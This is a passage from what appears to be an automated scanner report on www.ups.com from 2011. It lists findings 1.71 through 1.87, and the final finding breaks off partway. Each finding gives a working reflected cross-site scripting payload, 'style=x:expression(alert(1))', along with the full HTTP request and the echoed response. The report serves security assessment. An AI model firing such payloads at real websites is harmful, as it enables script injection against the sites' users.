Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35937


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us7ae54"style="x:expression(alert(1))"37c623b859e/en/register/reasons/index.html?WT.svl=SubNav">
...[SNIP]...

1.71. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/reasons/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f552a"style%3d"x%3aexpression(alert(1))"4ebe5159dea was submitted in the REST URL parameter 3. This input was echoed as f552a"style="x:expression(alert(1))"4ebe5159dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enf552a"style%3d"x%3aexpression(alert(1))"4ebe5159dea/register/reasons/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enf552a"style="x:expression(alert(1))"4ebe5159dea/register/reasons/index.html">
...[SNIP]...

1.72. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5693e"style%3d"x%3aexpression(alert(1))"d23773eb856 was submitted in the REST URL parameter 2. This input was echoed as 5693e"style="x:expression(alert(1))"d23773eb856 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us5693e"style%3d"x%3aexpression(alert(1))"d23773eb856/en/resources/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us5693e"style="x:expression(alert(1))"d23773eb856/en/resources/index.html">
...[SNIP]...

1.73. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c78"style%3d"x%3aexpression(alert(1))"8743722626c was submitted in the REST URL parameter 3. This input was echoed as b4c78"style="x:expression(alert(1))"8743722626c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enb4c78"style%3d"x%3aexpression(alert(1))"8743722626c/resources/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enb4c78"style="x:expression(alert(1))"8743722626c/resources/index.html">
...[SNIP]...

1.74. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/pay/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b225"style%3d"x%3aexpression(alert(1))"51c06fe1295 was submitted in the REST URL parameter 2. This input was echoed as 5b225"style="x:expression(alert(1))"51c06fe1295 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us5b225"style%3d"x%3aexpression(alert(1))"51c06fe1295/en/resources/pay/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us5b225"style="x:expression(alert(1))"51c06fe1295/en/resources/pay/index.html">
...[SNIP]...

1.75. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/pay/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70de7"style%3d"x%3aexpression(alert(1))"2a2e6173e9c was submitted in the REST URL parameter 3. This input was echoed as 70de7"style="x:expression(alert(1))"2a2e6173e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en70de7"style%3d"x%3aexpression(alert(1))"2a2e6173e9c/resources/pay/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:21 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44306


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en70de7"style="x:expression(alert(1))"2a2e6173e9c/resources/pay/index.html">
...[SNIP]...

1.76. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/delivery_change.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5219"style%3d"x%3aexpression(alert(1))"8878c7088f8 was submitted in the REST URL parameter 2. This input was echoed as b5219"style="x:expression(alert(1))"8878c7088f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usb5219"style%3d"x%3aexpression(alert(1))"8878c7088f8/en/resources/service/delivery_change.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38032


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usb5219"style="x:expression(alert(1))"8878c7088f8/en/resources/service/delivery_change.html">
...[SNIP]...

1.77. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/delivery_change.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edff4"style%3d"x%3aexpression(alert(1))"804f67be8a3 was submitted in the REST URL parameter 3. This input was echoed as edff4"style="x:expression(alert(1))"804f67be8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enedff4"style%3d"x%3aexpression(alert(1))"804f67be8a3/resources/service/delivery_change.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37592


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enedff4"style="x:expression(alert(1))"804f67be8a3/resources/service/delivery_change.html">
...[SNIP]...

1.78. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8721"style%3d"x%3aexpression(alert(1))"28636025260 was submitted in the REST URL parameter 2. This input was echoed as d8721"style="x:expression(alert(1))"28636025260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usd8721"style%3d"x%3aexpression(alert(1))"28636025260/en/resources/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usd8721"style="x:expression(alert(1))"28636025260/en/resources/service/index.html">
...[SNIP]...

1.79. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f5b"style%3d"x%3aexpression(alert(1))"13ae836b076 was submitted in the REST URL parameter 3. This input was echoed as 13f5b"style="x:expression(alert(1))"13ae836b076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en13f5b"style%3d"x%3aexpression(alert(1))"13ae836b076/resources/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43507


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en13f5b"style="x:expression(alert(1))"13ae836b076/resources/service/index.html">
...[SNIP]...

1.80. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a12"style%3d"x%3aexpression(alert(1))"cb99259b504 was submitted in the REST URL parameter 2. This input was echoed as 98a12"style="x:expression(alert(1))"cb99259b504 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us98a12"style%3d"x%3aexpression(alert(1))"cb99259b504/en/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us98a12"style="x:expression(alert(1))"cb99259b504/en/resources/ship/fraud.html">
...[SNIP]...

1.81. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429db"style%3d"x%3aexpression(alert(1))"4ada58a2fc4 was submitted in the REST URL parameter 3. This input was echoed as 429db"style="x:expression(alert(1))"4ada58a2fc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en429db"style%3d"x%3aexpression(alert(1))"4ada58a2fc4/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:17 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64412


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en429db"style="x:expression(alert(1))"4ada58a2fc4/resources/ship/fraud.html">
...[SNIP]...

1.82. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7790d"style%3d"x%3aexpression(alert(1))"6af3f34d8c0 was submitted in the REST URL parameter 2. This input was echoed as 7790d"style="x:expression(alert(1))"6af3f34d8c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us7790d"style%3d"x%3aexpression(alert(1))"6af3f34d8c0/en/resources/ship/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us7790d"style="x:expression(alert(1))"6af3f34d8c0/en/resources/ship/index.html">
...[SNIP]...

1.83. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e38"style%3d"x%3aexpression(alert(1))"dfe01cfd7cb was submitted in the REST URL parameter 3. This input was echoed as 38e38"style="x:expression(alert(1))"dfe01cfd7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en38e38"style%3d"x%3aexpression(alert(1))"dfe01cfd7cb/resources/ship/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en38e38"style="x:expression(alert(1))"dfe01cfd7cb/resources/ship/index.html">
...[SNIP]...

1.84. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5e8"style%3d"x%3aexpression(alert(1))"2bd8dfca6c2 was submitted in the REST URL parameter 2. This input was echoed as be5e8"style="x:expression(alert(1))"2bd8dfca6c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usbe5e8"style%3d"x%3aexpression(alert(1))"2bd8dfca6c2/en/resources/ship/terms/privacy.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50161


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usbe5e8"style="x:expression(alert(1))"2bd8dfca6c2/en/resources/ship/terms/privacy.html">
...[SNIP]...

1.85. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efc9"style%3d"x%3aexpression(alert(1))"e2d5151843d was submitted in the REST URL parameter 3. This input was echoed as 2efc9"style="x:expression(alert(1))"e2d5151843d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en2efc9"style%3d"x%3aexpression(alert(1))"e2d5151843d/resources/ship/terms/privacy.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en2efc9"style="x:expression(alert(1))"e2d5151843d/resources/ship/terms/privacy.html?WT.svl=Footer">
...[SNIP]...

1.86. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1657c"style%3d"x%3aexpression(alert(1))"d0105cd917d was submitted in the REST URL parameter 2. This input was echoed as 1657c"style="x:expression(alert(1))"d0105cd917d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us1657c"style%3d"x%3aexpression(alert(1))"d0105cd917d/en/resources/ship/terms/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us1657c"style="x:expression(alert(1))"d0105cd917d/en/resources/ship/terms/shipping/index.html">
...[SNIP]...

1.87. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/shipping/index.html

Issue detail

